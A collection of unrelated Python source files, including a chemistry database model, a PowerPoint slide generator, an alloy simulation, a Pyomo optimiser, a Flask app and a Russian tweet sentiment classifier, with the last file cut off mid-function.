# scalable engine data (ESF = engine scaling factor) to correct for
# sfc variation with altitude and temperature for a given power
# output - is it double counting?
#====================================================================
# ESF = (1.0 - KT*(theta-1.0))*(1.0 + KD*(delta-1.0))
# sfc_corr = (-0.00932*ESF*ESF + 0.865*ESF + 0.4450)/(ESF+0.3010)
#====================================================================
# after temperature and altitude corrections
#====================================================================
# sfc = sfc_corr*sfc_base
sfc = sfc_base
#====================================================================
# converting from lb/hp-hr to kg/kW-hr
#====================================================================
sfc = sfc*0.45359/0.7457
return sfc
|
from sqlalchemy.orm import backref, relationship, column_property, synonym
from sqlalchemy.ext.hybrid import hybrid_property
from sqlalchemy import select
from credoscript import Base, BaseQuery, schema
class Fragment(Base):
"""
Class representing a Fragment entity from CREDO.
Attributes
----------
fragment_id
ism
Mapped Attributes
-----------------
ChemCompFragments : Query
ChemComps : Query
Chemical components that share this fragment.
"""
__tablename__ = '%s.fragments' % schema['pdbchem']
ism_ob_can = synonym('ism')
ChemCompFragments = relationship("ChemCompFragment",
primaryjoin="ChemCompFragment.fragment_id==Fragment.fragment_id",
foreign_keys = "[ChemCompFragment.fragment_id]",
lazy='dynamic', uselist=True, innerjoin=True,
backref=backref('Fragment', uselist=False, innerjoin=True, lazy=False))
ChemComps = relationship("ChemComp", query_class=BaseQuery,
secondary=Base.metadata.tables['%s.chem_comp_fragments' % schema['pdbchem']],
primaryjoin="Fragment.fragment_id==ChemCompFragment.fragment_id",
secondaryjoin="ChemCompFragment.het_id==ChemComp.het_id",
foreign_keys="[ChemCompFragment.fragment_id, ChemComp.het_id]",
lazy='dynamic', uselist=True, innerjoin=True) #
RDMol = relationship("FragmentRDMol",
primaryjoin="FragmentRDMol.fragment_id==Fragment.fragment_id",
foreign_keys="[FragmentRDMol.fragment_id]",
uselist=False, innerjoin=True,
backref=backref('Fragment', uselist=False, innerjoin=True))
RDFP = relationship("FragmentRDFP",
primaryjoin="FragmentRDFP.fragment_id==Fragment.fragment_id",
foreign_keys="[FragmentRDFP.fragment_id]",
uselist=False, innerjoin=True,
backref=backref('Fragment', uselist=False, innerjoin=True))
def __repr__(self):
"""
"""
return '<Fragment({self.fragment_id})>'.format(self=self)
@hybrid_property
def ism_ob_univ(self):
return self.Synonyms.ism_ob
@hybrid_property
def ism_oe(self):
return self.Synonyms.ism_oe
@hybrid_property
def ism_rdk(self):
return self.Synonyms.ism_rdk
@property
def Children(self):
"""
Returns all fragments that are derived from this fragment (next level
in fragmentation hierarchy).
"""
adaptor = FragmentAdaptor(dynamic=True)
return adaptor.fetch_all_children(self.fragment_id)
@property
def Parents(self):
"""
"""
adaptor = FragmentAdaptor(dynamic=True)
return adaptor.fetch_all_parents(self.fragment_id)
@property
def Leaves(self):
"""
Returns all terminal fragments (leaves) of this fragment.
"""
adaptor = FragmentAdaptor(dynamic=True)
return adaptor.fetch_all_leaves(self.fragment_id)
@property
def Descendants(self):
"""
Returns all children of this fragment in the complete hierarchy.
"""
adaptor = FragmentAdaptor(dynamic=True)
return adaptor.fetch_all_descendants(self.fragment_id)
@classmethod
def like(self, smiles):
"""
Returns an SQL function expression that uses the PostgreSQL trigram index
to compare the SMILES strings.
"""
return self.ism.op('%%')(smiles)
class FragmentSynonyms(Base):
__tablename__ = '%s.fragment_synonyms' % schema['pdbchem']
Fragment = relationship(Fragment,
primaryjoin="Fragment.fragment_id==FragmentSynonyms.fragment_id",
foreign_keys="[Fragment.fragment_id]", uselist=False,
backref=backref('Synonyms', uselist=False, innerjoin=True, lazy=False))
from ..adaptors.fragmentadaptor import FragmentAdaptor
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Tue Aug 13 15:57:04 2019
@author: rohit
"""
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Tue Aug 13 14:23:08 2019
@author: rohit
"""
import numpy as np
dot =""
data = np.load(dot + "/saver-500-3/processed_test_data_128/processed_test_data_128.npy")
print ("data shape : {}".format(data.shape))
print ("done")
length = data.shape[0]
print ("total_length : {}".format(length))
rand = np.arange(length)
np.random.shuffle(rand)
print (rand[1:10])
train_all_s = data[rand,:,:,:]
print ("train_all_s shape : {}".format(train_all_s.shape))
save_path = dot + "/saver-500-3/"
size = length//3
for i in range(3):
data = train_all_s[i*size:(i+1)*size,:,:,:]
print ("index : {} : {}".format(i*size,(i+1)*size))
print (data.shape)
np.save(save_path + str(i+1) + ".npy", data)
print ("saved as {}".format(save_path + str(i+1) + ".npy"))
|
from pptx import Presentation
from pptx.oxml import _SubElement
from pptx.util import Cm, Pt
import os
import glob
from parseJpg import searchAllPsJpgs, sortGrpPsJpgs
import Image
def main():
prs = Presentation('template_red.pptx')
title_slidelayout = prs.slidemasters[0].slidelayouts[0]
slide = prs.slides.add_slide(title_slidelayout)
title = slide.shapes.title
subtitle = slide.shapes.placeholders[1]
title.text = "Title!"
subtitle.text = "subtitle"
#-------glob current folder
Dirs = ['./fig/']
psJpgs = searchAllPsJpgs(Dirs)
for psJpg in psJpgs:
psJpg.printAll()
allSlides = sortGrpPsJpgs(psJpgs)
# slidesEachNumField(prs, allSlides)
slidesCompareFields(prs, allSlides)
slidesCompareNum(prs, allSlides)
#------------------------------------------
Dirs = [o for o in glob.glob('../../Run/*') if os.path.isdir(o)]
for Dir in Dirs:
Dir = Dir.replace("\\", "/")
print "Dirs=", Dirs
psJpgs = searchAllPsJpgs(Dirs)
allSlides = sortGrpPsJpgs(psJpgs)
slidesEachNumField(prs, allSlides)
slidesCompareFields(prs, allSlides)
slidesCompareNum(prs, allSlides)
foutName = 'printout_cfdresults.pptx'
prs.save(foutName)
def slidesEachNumField(prs, allSlides):
priors = []
groupKeys = []
priors.append('case')
priors.append('num')
groupKeys.append('case') # things they have in common
groupKeys.append('num') # things they have in common
groupKeys.append('field') # things they have in common
titleKeys = ['case', 'numFull', 'fieldFull'] # keys to determine
# the title of slide
tabKeys = ['locFull'] # will determine the text in the table
slides = allSlides.sortWithNewKeys(priors, groupKeys,
titleKeys, tabKeys)
countFigsNmakeSlides(prs, slides)
def slidesCompareFields(prs, allSlides):
priors = []
groupKeys = []
priors.append('case')
priors.append('num')
groupKeys.append('case') # things they have in common
groupKeys.append('num') # things they have in common
titleKey = 'numFull' # will determine the title of slide
titleKeys = ['case', 'numFull'] # keys to determine the title of slide
groupKeys.append(titleKey.replace('Full', ''))
tabKeys = ['fieldFull', 'unit'] # will determine the text in the table
slides = allSlides.sortWithNewKeys(priors, groupKeys, titleKeys, tabKeys)
countFigsNmakeSlides(prs, slides)
def slidesCompareNum(prs, allSlides):
priors = []
groupKeys = []
priors.append('case')
priors.append('field')
groupKeys.append('case') # things they have in common
groupKeys.append('field') # things they have in common
groupKeys.append('loc') # things they have in common
titleKey = 'fieldFull' # will determine the title of slide
titleKeys = ['case', 'fieldFull'] # keys to determine
# the title of slide
groupKeys.append(titleKey.replace('Full', ''))
tabKeys = ['numFull'] # will determine the text in the table
slides = allSlides.sortWithNewKeys(priors, groupKeys, titleKeys, tabKeys)
countFigsNmakeSlides(prs, slides)
def countFigsNmakeSlides(prs, slidepages):
i = 0
for s in slidepages:
i += 1
print "\n +++ slidepage %d: " % i,
print [s.frames[j].code for j in range(s.nf)]
if s.nf == 2:
addTwoFigs(prs, s)
if s.nf == 6:
addSixFigs(prs, s)
def imageSize(img_path):
img = Image.open(img_path)
pixelWidth = float(img.size[0])
pixelHeight = float(img.size[1])
# dpi = float(img.info['dpi'])
# cmWidth = Cm(pixelWidth / dpi * 2.54)
# cmHeight = Cm(pixelHeight / dpi * 2.54)
return [pixelWidth, pixelHeight]
def addTwoFigs(prs, slidepage, titleText=""):
slidelayout = prs.slidemasters[1].slidelayouts[0]
slide = prs.slides.add_slide(slidelayout)
#---- add figure on the left --------------
img_path = slidepage.frames[0].jpgfileFp
top = Cm(6.25)
tabLeft = left = Cm(1.14)
width = Cm(11.56)
# height = Cm(19.05)
slide.shapes.add_picture(img_path, left, top, width)
#---- add figure on the right--------------
img_path = slidepage.frames[1].jpgfileFp
left = left + width
slide.shapes.add_picture(img_path, left, top, width)
#---- title ------
title = slide.shapes.title
title.text = slidepage.titleText
print " title = ", titleText
addTableTwo(slide, tabLeft,
width, slidepage.tabTextList)
addTextBot(slide, slidepage.boxText, left=tabLeft)
return slide
def addThreeFigs(prs, psjpg1, psjpg2, psjpg3, titleText=""):
slidelayout = prs.slidemasters[1].slidelayouts[0]
slide = prs.slides.add_slide(slidelayout)
#---- add figure on the left --------------
img_path = psjpg1.jpgfileFp
txBoxLeft = left = Cm(1.27)
top = Cm(4.65)
width = Cm(13.27)
# height = Cm(19.05)
slide.shapes.add_picture(img_path, left, top, width)
#---- add figure in the middle--------------
img_path = psjpg2.jpgfileFp
left = Cm(8.86)
slide.shapes.add_picture(img_path, left, top, width)
#---- add figure on the right--------------
img_path = psjpg3.jpgfileFp
left = Cm(12.86)
slide.shapes.add_picture(img_path, left, top, width)
#---- title ------
title = slide.shapes.title
if titleText == "":
titleText = psjpg1.case + ': ' + psjpg1.fieldFull
title.text = titleText
addTextBot(slide, "Operating point: %s" %
(psjpg1.numFull), left=txBoxLeft)
addTableTwo(slide, psjpg1, psjpg2)
return slide
def addSixFigs(prs, slidepage, titleText=""):
slidelayout = prs.slidemasters[1].slidelayouts[0]
slide = prs.slides.add_slide(slidelayout)
#width = Cm(8.03)
height = Cm(6)
#---- add figure on the left --------------
img_path = slidepage.frames[0].jpgfileFp
[picW, picH] = imageSize(img_path)
WHratio = picW / picH
width = height * WHratio
top = Cm(4.65)
txBoxLeft = left = Cm(1.27)
left = Cm(2.5)
# height = Cm(19.05)
slide.shapes.add_picture(img_path, left, top, width=width, height=height)
#---- add figure in the middle--------------
img_path = slidepage.frames[1].jpgfileFp
left = Cm(9.25)
slide.shapes.add_picture(img_path, left, top, height=height)
#---- add figure on the right--------------
img_path = slidepage.frames[2].jpgfileFp
left = Cm(16)
slide.shapes.add_picture(img_path, left, top, height=height)
#---- add figure on the leftBot --------------
img_path = slidepage.frames[3].jpgfileFp
top = Cm(11.33)
left = Cm(2.5)
slide.shapes.add_picture(img_path, left, top, height=height)
#---- add figure on the midBot--------------
img_path = slidepage.frames[4].jpgfileFp
left = Cm(9.25)
slide.shapes.add_picture(img_path, left, top, height=height)
#---- add figure on the rightBot--------------
img_path = slidepage.frames[5].jpgfileFp
left = Cm(16)
slide.shapes.add_picture(img_path, left, top, height=height)
#---- title ------
title = slide.shapes.title
title.text = slidepage.titleText
print " title = ", titleText
# addTextBot(slide, "Operating point: %s" % (psjpg1.op), left=txBoxLeft)
addTableSix(slide,
width, slidepage.tabTextList)
return slide
def addTableTwo(slide, left, tabwidth, tabTextList):
shapes = slide.shapes
rows = 1
cols = 2
# left = Cm(1.27)
top = Cm(16.4)
tabwidth = int(tabwidth) # pixel has to be integer
# width = Cm(22.88)
width = tabwidth * 2
height = Cm(0.8)
tbl = shapes.add_table(rows, cols, left, top, width, height)
# set column widths
tbl.columns[0].width = tabwidth
tbl.columns[1].width = tabwidth
for i in range(0, 2):
text = tabTextList[i]
print " tabText = %s" % text
tbl.cell(0, i).text = text
tf = tbl.cell(0, i).textframe
font = tf.paragraphs[0].font
font.size = Pt(16)
font.bold = False
set_font_color_and_typeface(font, rgbColor("BLACK"), 'Arial')
def addTableSix(slide,
tabwidth,
tabTextList):
shapes = slide.shapes
rows = 1
cols = 3
left = Cm(2.5)
top = Cm(10.36)
tabwidth = int(tabwidth) # pixel has to be integer
width = tabwidth * 3
height = Cm(0.6)
tbl = shapes.add_table(rows, cols, left, top, width, height)
# set column widths
tbl.columns[0].width = tabwidth
tbl.columns[1].width = tabwidth
tbl.columns[2].width = width - 2 * tabwidth
# write column headings
for i in range(0, 3):
text = tabTextList[i]
print " tabText = %s" % text
tbl.cell(0, i).text = text
tf = tbl.cell(0, i).textframe
font = tf.paragraphs[0].font
font.size = Pt(10)
font.bold = False
set_font_color_and_typeface(font, rgbColor("BLACK"), 'Arial')
top = Cm(16.93)
tbl = shapes.add_table(rows, cols, left, top, width, height)
for i in range(0, 3):
text = tabTextList[i + 2]
print " tabText = %s" % text
tbl.cell(0, i).text = text
tf = tbl.cell(0, i).textframe
font = tf.paragraphs[0].font
font.size = Pt(10)
font.bold = False
set_font_color_and_typeface(font, rgbColor("BLACK"), 'Arial')
def addTextBot(slide, boxText, left=Cm(0.0), top=Cm(17.55)):
#---- add text box on the bottom--------------
# left = Cm(0.0)
# top = Cm(17.55)
width = Cm(25.4)
height = Cm(1.0)
txBox = slide.shapes.add_textbox(left, top, width, height)
tf = txBox.textframe
tf.text = boxText
tf.paragraphs[0].font.size = Pt(14)
tf.paragraphs[0].font.bold = False
#p = tf.add_paragraph()
#p.text = boxText
#p.font.bold = False
#p = tf.add_paragraph()
#p.text = "This is a third paragraph that's big"
#p.font.size = Pt(40)
#f = txBox.textframe
def rgbColor(colorName):
colorlist = {}
colorlist["ORANGE"] = 'FF6600'
colorlist["WHITE"] = 'FFFFFF'
colorlist["BLACK"] = '000000'
return colorlist[colorName]
def set_font_color_and_typeface(font, rgbColor, typeface=None):
rPr = font._Font__rPr
solidFill = _SubElement(rPr, 'a:solidFill')
srgbClr = _SubElement(solidFill, 'a:srgbClr')
srgbClr.set('val', rgbColor)
if typeface:
latin = _SubElement(rPr, 'a:latin')
latin.set('typeface', typeface)
if __name__ == "__main__":
main()
|
# Ejercicio 6
def frameSpace1(text, spaces): #Solución 1: varias variables
# Modificar el programa anterior para definir el número de espacios entre el marco y las palabras. Es decir, la función ahora aceptará 2 parámetros, el número de espacios y el string (de una o más palabras)
frameUpDown = ""
frameMidle = ""
frameFinal = ""
for i in range(1,len(text)+5): #Frame de arriba y abajo
frameUpDown += "*"
frameUpDown += "\n"
for i in range(1,len(text)+5): #Frame de medios
if i == 1 or i == len(text)+4:
frameMidle += "*"
else:
frameMidle += " "
frameMidle += "\n"
# Frame completo
frameFinal += frameUpDown
for i in range(1,spaces+1):
frameFinal += frameMidle
frameFinal += f"* {text} * \n"
for i in range(1, spaces):
frameFinal += frameMidle
frameFinal += frameUpDown
return frameFinal
def frameSpace2(text, spaces): #Solución 2: una sola variable
# Modificar el programa anterior para definir el número de espacios entre el marco y las palabras. Es decir, la función ahora aceptará 2 parámetros, el número de espacios y el string (de una o más palabras)
frame = ""
for i in range(1,len(text)+5): #Frame de arriba y abajo
frame += "*"
frame += "\n"
for i in range(1,spaces+1):
for i in range(1,len(text)+5): #Frame de medios
if i == 1 or i == len(text)+4:
frame += "*"
else:
frame += " "
frame += "\n"
frame += f"* {text} * \n"
for i in range(1,spaces+1):
for i in range(1,len(text)+5): #Frame de medios
if i == 1 or i == len(text)+4:
frame += "*"
else:
frame += " "
frame += "\n"
for i in range(1,len(text)+5): #Frame de arriba y abajo
frame += "*"
return frame
# Casos de prueba
test1 = frameSpace1("You only live once",3)
test2 = frameSpace2("Water fountain",3)
print(test1)
print(test2) |
n, m = map(int, input().split())
array = [int(input()) for _ in range(n)]
d = [0] * 1000
for i in array:
d[i] = 1
if d[m] == 0:
print(-1)
else:
print(d[m]) |
import simulationRunningFunctions as srf
from math import factorial, fabs
def binProb(n, comp, dimensions, gridLength):
nAtoms = gridLength**dimensions
if dimensions == 2:
Z = 4 # no. of nearest neighbours for a given atom
elif dimensions == 3:
Z = 6
f = comp / 100
# Binomial distribution formula (next 2 lines):
ZCn = factorial(Z) / float(factorial(n) * factorial(Z - n))
P = ZCn * (f * f**(Z - n) * (1 - f)**n + (1 - f) * f**n * (1 - f)**(Z - n))
nEXP = nAtoms * P
return nEXP
def unlikeNeighbourCount(grid, xC, yC, zC, dimensions):
"""Returns count of how many unlike neighbours are around atom C"""
lengthOfGrid = len(grid)
xU, yU = xC - 1, yC
xD, yD = xC + 1, yC
xL, yL = xC, yC - 1
xR, yR = xC, yC + 1
xD = srf.cValidate(xD, grid, lengthOfGrid, 'x', dimensions)
yR = srf.cValidate(yR, grid, lengthOfGrid, 'y', dimensions)
xList = [xU, xD, xL, xR]
yList = [yU, yD, yL, yR]
slice1 = '[j, yList[i]]'
slice2 = '[xC, yC]'
if dimensions == 3:
zU, zD, zL, zR = zC, zC, zC, zC
xBP, yBP, zBP = xC, yC, zC - 1
xAP, yAP, zAP = xC, yC, zC + 1
zAP = srf.cValidate(zAP, grid, lengthOfGrid, 'z', dimensions)
xList.extend([xBP, xAP])
yList.extend([yBP, yAP])
zList = [zU, zD, zL, zR, zBP, zAP]
slice1 = '[j, yList[i], zList[i]]'
slice2 = '[xC, yC, zC]'
tempCount = 0
for i, j in enumerate(xList):
if eval('grid' + slice1) != eval('grid' + slice2):
tempCount += 1
return tempCount
def generate_nList(grid, dimensions):
"""Generates nList, which stores no. of points in grid with no. of unlike
neighbours equal to the list's index, so each index is a counte for each
possible no. of unlike neighbours"""
nList = [0] * (dimensions * 2 + 1)
lengthOfGrid = len(grid)
for i in range(lengthOfGrid):
for j in range(lengthOfGrid):
xC, yC = i, j
if dimensions == 2:
zC = None
result = unlikeNeighbourCount(grid, xC, yC, zC, dimensions)
nList[result] += 1 # adds 1 to corresponding value of unlike neigbours in
# nList
if dimensions == 3:
for k in range(lengthOfGrid):
zC = k
result = unlikeNeighbourCount(grid, xC, yC, zC, dimensions)
nList[result] += 1
return nList
def findNumOfUnlikeBonds(grid, dimensions):
"""Returns total number of unlike bonds in grid"""
nList = generate_nList(grid, dimensions)
numUnlike = 0 # actual no. of unlike bonds obtained
for i, j in enumerate(nList): # converts nList to total number of unlike bond
# obtained
numUnlike += 0.5 * j * i
return numUnlike
# #Order Measuring Function
def getOrder(grid, comp, dimensions):
"""Computes distribution of unlike neighbours; i.e. no. of sites w/ 0 unlike
neighbours (i.e. very ordered, together), no. of sites w/ 1 unlike neighbour,
etc. up to 4 in 2D"""
nList = generate_nList(grid, dimensions)
EXPList = [0] * len(nList)
for i, j in enumerate(nList):
EXPList[i] = binProb(i, comp, dimensions, len(grid))
differenceCount = 0
for i, j in enumerate(nList):
differenceCount += fabs(j - EXPList[i])
differenceCount *= 1 / float(len(nList)) # 1/7 for 3D, 1/5 for 2D
return differenceCount, nList, EXPList
def getTotalEnergy(grid, localEam, dimensions):
"""Function that computes and returns total energy of inputted grid"""
numUnlike = findNumOfUnlikeBonds(grid, dimensions)
totalEnergy = numUnlike * localEam
return totalEnergy
|
# -*- coding: utf-8 -*-
import pyomo.environ as pyomo
from pyomo.opt import SolverFactory
def optimize(data, config):
# model
model = pyomo.ConcreteModel()
# parameters
shippingcost = {x['seller']: x['shippingcost'] for x in data}
distance = {x['seller']: x['distance'] for x in data}
ordercount = {x['seller']: x['ordercount'] for x in data}
# define sets
I = list(set(x['product'] for x in data))
J = list(set(x['seller'] for x in data))
IJ = [(x['product'], x['seller']) for x in data]
# decision vaiables
model.x = pyomo.Var(IJ, domain=pyomo.Integers, bounds=(0, 1), doc='trans')
model.y = pyomo.Var(J, domain=pyomo.Integers, bounds=(0, 1), doc='sellertrans')
# constraints
model.cons = pyomo.ConstraintList(doc='constraints')
# transport to all demand
for i in I:
model.cons.add(sum([model.x[ij] for ij in model.x if ij[0] == i]) == 1)
# seller transportation constraints
maxtrans = len(IJ)
for j in J:
model.cons.add(sum([model.x[ij] for ij in model.x if ij[1] == j]) <= model.y[j] * maxtrans)
# objective function
shippingcost_penalty = 0 if sum(shippingcost.values()) == 0 \
else 1000000000 * (sum(model.y[j] * shippingcost[j] for j in J) / sum(shippingcost.values()))
sellertotal_penalty = 0 if len(J) == 0 \
else 1000000 * (sum(model.y[j] for j in J) / len(J))
distance_penalty = 0 if sum(distance.values()) == 0 \
else 1000 * (sum(model.y[j] * distance[j] for j in J) / sum(distance.values()))
ordercount_penalty = 0 if sum(ordercount.values()) == 0 \
else 1 * (sum(model.y[j] * ordercount[j] for j in J) / sum(ordercount.values()))
model.obj = pyomo.Objective(expr = shippingcost_penalty + sellertotal_penalty + distance_penalty + ordercount_penalty,
sense = pyomo.minimize)
# solve
if config['app']['solver_path'] == "None":
s = SolverFactory(config['app']['solver'])
else:
s = SolverFactory(config['app']['solver'], executable=config['app']['solver_path'])
status = s.solve(model)
# gen output
x = []
for ij in model.x:
if model.x[ij].value > 0:
x.append({
"product": ij[0],
"seller": ij[1],
"shippingcost": shippingcost[ij[1]],
})
y = []
for j in model.y:
if model.y[j].value > 0:
y.append({
"seller": j,
})
output = {
"status_solver": str(status['Solver'][0]['Status']),
"status_termination": str(status['Solver'][0]['Termination condition']),
"total_shippingcost": sum([shippingcost[j['seller']] for j in y]),
"total_sellers": len(y),
"total_distance": sum([distance[j['seller']] for j in y]),
"total_ordercount": sum([ordercount[j['seller']] for j in y]),
"result": x
}
return output |
from src.utils.request import get_text, get_bytes
import json
from random import choice
async def get_erciyuan():
licking_url = 'https://api.mtyqx.cn/api/random.php?return=json'
data = json.loads(
await get_text(licking_url))
print(data)
if data['code'] == '200':
return data['imgurl']
else:
return ''
|
T = int(input())
P = int(input())
for z in range(T):
risposte= []
cazzi = []
for i in range(100):
ll = str(input())[:1001]
risposte.append([int(x) for x in ll])
for r in risposte:
sum=0
for c in r:
sum+=c
cazzi.append(sum)
print("Case #"+str(z+1)+": "+str(cazzi.index(max(cazzi))+1))
|
# import packages
import PyPDF2
import os
def searchInPDF(filename, s):
# open the pdf file
f = PyPDF2.PdfFileReader(filename)
NumPages = f.getNumPages()
# extract text and do the search
for i in range(0, NumPages):
page = f.getPage(i)
Text = page.extractText().rstrip('\n').lower()
if s in Text:
return True
return False
os.system("cls")
directory = os.getcwd()
s = input("Please enter the expression you want to search : ")
inp = ""
for c in s.lower():
if c != " ":
inp += c
a = []
for filename in os.listdir(directory):
if filename.endswith(".pdf"):
print("Recherche dans", filename, "...")
res = searchInPDF(filename, inp)
if res == True:
a.append(filename)
os.system("cls")
if len(a) != 0:
print("'" + s + "' was found in the following PDFs: ")
print(a)
else:
print("'" + s + "' wasn't found.")
|
from app import *
from flask import session, redirect, url_for, render_template, abort, request, flash, send_from_directory, jsonify
import os
from models import Projects
from keras import backend as K
@app.route('/project', methods=['GET', 'POST'])
def generate():
if request.method == 'POST':
project_name = request.form.get('project_name')
style = request.form.get('style')
# Prep model on basis of which mdoel is requested
model = prep_model()
# check if the post request has the file part
if 'file' not in request.files:
flash('No file part')
return redirect(request.url)
file = request.files['file']
# if user does not select file, browser still
# submits an empty part without filename
if file.filename == '':
flash('No selected file')
return redirect(request.url)
if file and allowed_file(file.filename):
new_project = Projects(project_name)
db.session.add(new_project)
db.session.commit()
project_id = new_project.id
file_name = str(project_id) + '.png'
file_address = os.path.join(os.getcwd(), app.config['UPLOAD_FOLDER'], file_name)
file.save(file_address)
output_folder = os.path.join(os.getcwd(), app.config['OUTPUT_FOLDER'])
html = model.convert_single_image(output_folder, png_path=file_address, print_generated_output=0, get_sentence_bleu=0, original_gui_filepath=None, style=style)
project = Projects.get_project_by_id(project_id)
project.html_code = html
project.deploy_url = f'http://localhost:5000/deploy/{project_id}'
db.session.add(project)
db.session.commit()
K.clear_session()
return get_project(project_id)
else:
return render_template('generator_page.html')
@app.route('/project/<id>', methods=['GET'])
def get_project(id):
return jsonify(Projects.get_project_by_id(id).to_dict())
@app.route('/dashboard', methods=['GET'])
def dash():
return jsonify([project.to_dict() for project in Projects.query.all()])
@app.route('/deploy/<project_id>', methods=['GET'])
def deploy(project_id):
project = Projects.get_project_by_id(project_id)
return project.html_code
@app.route('/html/<id>', methods=['POST'])
def change_html(id):
project = Projects.get_project_by_id(id)
project.html_code = request.form.get('html_code')
db.session.add(project)
db.session.commit()
return get_project(id)
@app.route('/output/<path:path>')
def generated(path):
return send_from_directory('generated', path)
@app.route('/upload/<path:path>')
def uploaded(path):
return send_from_directory('upload', path)
@app.route('/static/<path:path>')
def staticpath(path):
return send_from_directory('static', path)
|
# -*- coding: utf-8 -*-
from sklearn.ensemble import RandomForestClassifier
from gensim.models import Word2Vec
import _pickle as cPickle
import pymorphy2
import csv
import re
filenamePositive = "./csv/positive.csv"
filenameNegative = "./csv/negative.csv"
filenameNormFormPos = "./csv/normFormPos.csv"
filenameNormFormNeg = "./csv/normFormNeg.csv"
filenameNormFormPos_test = "./csv/normFormPos_test.csv"
filenameNormFormNeg_test = "./csv/normFormNeg_test.csv"
filenameVecPos = "./csv/vecPos.csv"
filenameVecNeg = "./csv/vecNeg.csv"
filenameVecPos_test = "./csv/vecPos_test.csv"
filenameVecNeg_test = "./csv/vecNeg_test.csv"
filenameWVModel = "./models/W2V/analyzer.model"
filenameClassifier = "./models/Classifier/classifier.pkl"
necessary_part = ["NOUN", "ADJF", "ADJS", "VERB", "INFN", "PRTF", "PRTS", "GRND"]
morf = pymorphy2.MorphAnalyzer()
vector_size = 300
# W2V_model = 0
# classifier = 0
def progress_bar(iteration, total, prefix='', suffix='', decimals=1, length=50, fill='█', printEnd="\r"):
percent = ("{0:." + str(decimals) + "f}").format(100 * (iteration / float(total)))
filled_length = int(length * iteration // total)
bar = fill * filled_length + '-' * (length - filled_length)
print('\r%s |%s| %s%% %s' % (prefix, bar, percent, suffix), end=printEnd)
if iteration == total:
print()
def read_twit(file_path):
training_sample = []
test_sample = []
with open(file_path, "r", encoding='utf8', newline="") as file:
counter = 1
reader = csv.reader(file, delimiter=';', quotechar='"')
num = quantityRowInCSV(file_path)
for row in reader:
string = re.sub(r"[^А-Яа-я\s]+", "", row[3]).strip()
string = re.sub(r"[_A-Za-z0-9]+", "", string).strip()
string = re.sub(r"[\s]{2,}", " ", string)
if counter / num <= 0.9:
training_sample.append(string)
else:
test_sample.append(string)
counter += 1
return training_sample, test_sample
def quantityRowInCSV(filename):
num = 0
with open(filename, "r", encoding='utf8', newline="") as file:
reader = csv.reader(file, delimiter=';', quotechar='"')
num = sum(1 for line in reader)
return num
def normalizationOfSentence(sentence):
normal_words = []
s = sentence.lower()
# s = s.translate(
# str.maketrans("!\"#$%&'()*+,-./:;<=>?@[\]^_`{|}~0123456789", " " * 42))
tokens = s.split()
for word in tokens:
p = morf.parse(word)[0]
part = p.tag.POS
if part in necessary_part:
normal_words.append(p.normal_form)
return normal_words
def load_w2v_model():
return Word2Vec.load(filenameWVModel)
def recordNormalForms(dt, file_path):
with open(file_path, "w", newline='') as csv_file:
writer = csv.writer(csv_file, delimiter=';')
for line in dt:
writer.writerow(line)
def normalization_mas_sentence(mas_sentence, file_path_save=None):
result = []
progress_bar(0, len(mas_sentence), prefix='Progress:', suffix='Complete', length=50)
for i in range(0, len(mas_sentence)):
norm = normalizationOfSentence(mas_sentence[i])
if len(norm) != 0:
result.append(norm)
progress_bar(i, len(mas_sentence), prefix='Progress:', suffix='Complete', length=50)
if file_path_save is not None:
recordNormalForms(result, file_path_save)
if len(result) > 0:
return result
def create_w2v_model(dt_Positive, dt_Negative, dt_PositiveTest, dt_NegativeTest):
mdl = Word2Vec(dt_Positive + dt_Negative + dt_PositiveTest + dt_NegativeTest, size=vector_size, window=7,
min_count=0, workers=8, sg=1)
mdl.init_sims(replace=True)
mdl.save(filenameWVModel)
return mdl
def test_model(model, data_positive_test, data_negative_test):
arr = model.predict(data_positive_test)
number_positive = 0
for i in arr:
if i == 1:
number_positive += 1
arr = model.predict(data_negative_test)
number_negative = 0
for i in arr:
if i == -1:
number_negative += 1
print("ACC = ", (number_positive + number_negative) / (len(data_positive_test) + len(data_negative_test)))
def featurize_w2v(model, sentences):
v = []
for word in sentences:
n = 0
count = 0
for i in range(0, vector_size):
print(word)
try:
vec = model[word]
n += vec[i]
count += 1
except KeyError:
continue
v.append(n / count)
return v
def calc_vector(WVmodel, mas_sentence, file_path=None):
for i in range(0, len(mas_sentence)):
mas_sentence[i] = featurize_w2v(WVmodel, mas_sentence[i])
if file_path is not None:
with open(file_path, "w", newline='') as csv_file:
writer = csv.writer(csv_file, delimiter=';')
for line in mas_sentence:
writer.writerow(line)
def read_normalize_form(file_path):
result = []
with open(file_path, "r", encoding='utf8', newline="") as file:
reader = csv.reader(file, delimiter=';', quotechar='"')
for row in reader:
result.append(row)
return result
def init(read_source=False, read_normalize=False, load_models=False, load_classifier=False):
if read_source:
# Чтение позитивных
print("Чтение позитивных твитов")
data_positive, data_positive_test = read_twit(filenamePositive)
print(" Готово")
# Чтение негативных
print("Чтение негативных твитов")
data_negative, data_negative_test = read_twit(filenameNegative)
print(" Готово")
# Нормализация
print("Нормализация предложений")
data_positive = normalization_mas_sentence(data_positive, file_path_save=filenameNormFormPos)
data_negative = normalization_mas_sentence(data_negative, file_path_save=filenameNormFormNeg)
data_positive_test = normalization_mas_sentence(data_positive_test, file_path_save=filenameNormFormPos_test)
data_negative_test = normalization_mas_sentence(data_negative_test, file_path_save=filenameNormFormNeg_test)
print(" Готово")
if read_normalize:
data_positive = read_normalize_form(filenameNormFormPos)
data_negative = read_normalize_form(filenameNormFormNeg)
data_positive_test = read_normalize_form(filenameNormFormPos_test)
data_negative_test = read_normalize_form(filenameNormFormNeg_test)
if not load_models:
print("Создание WV модели")
model_w2v = create_w2v_model(data_positive, data_negative, data_positive_test, data_negative_test)
print(" Готовов")
else:
print("Загрузка WV модели")
model_w2v = load_w2v_model()
print(" Модель загружена")
if not load_classifier:
print("Считаем векора")
calc_vector(model_w2v, data_positive, filenameVecPos)
calc_vector(model_w2v, data_negative, filenameVecNeg)
calc_vector(model_w2v, data_positive_test, filenameVecPos_test)
calc_vector(model_w2v, data_negative_test, filenameVecNeg_test)
print(" Готовов")
print("\nНачато создание леса")
Y_pos = [1 for _ in range(len(data_positive))]
Y_neg = [-1 for _ in range(len(data_negative))]
forest = RandomForestClassifier(n_estimators=100, n_jobs=-1)
classifier.fit(data_positive + data_negative, Y_pos + Y_neg)
print(" Лес построен")
with open(filenameClassifier, 'wb') as fid:
cPickle.dump(classifier, fid)
else:
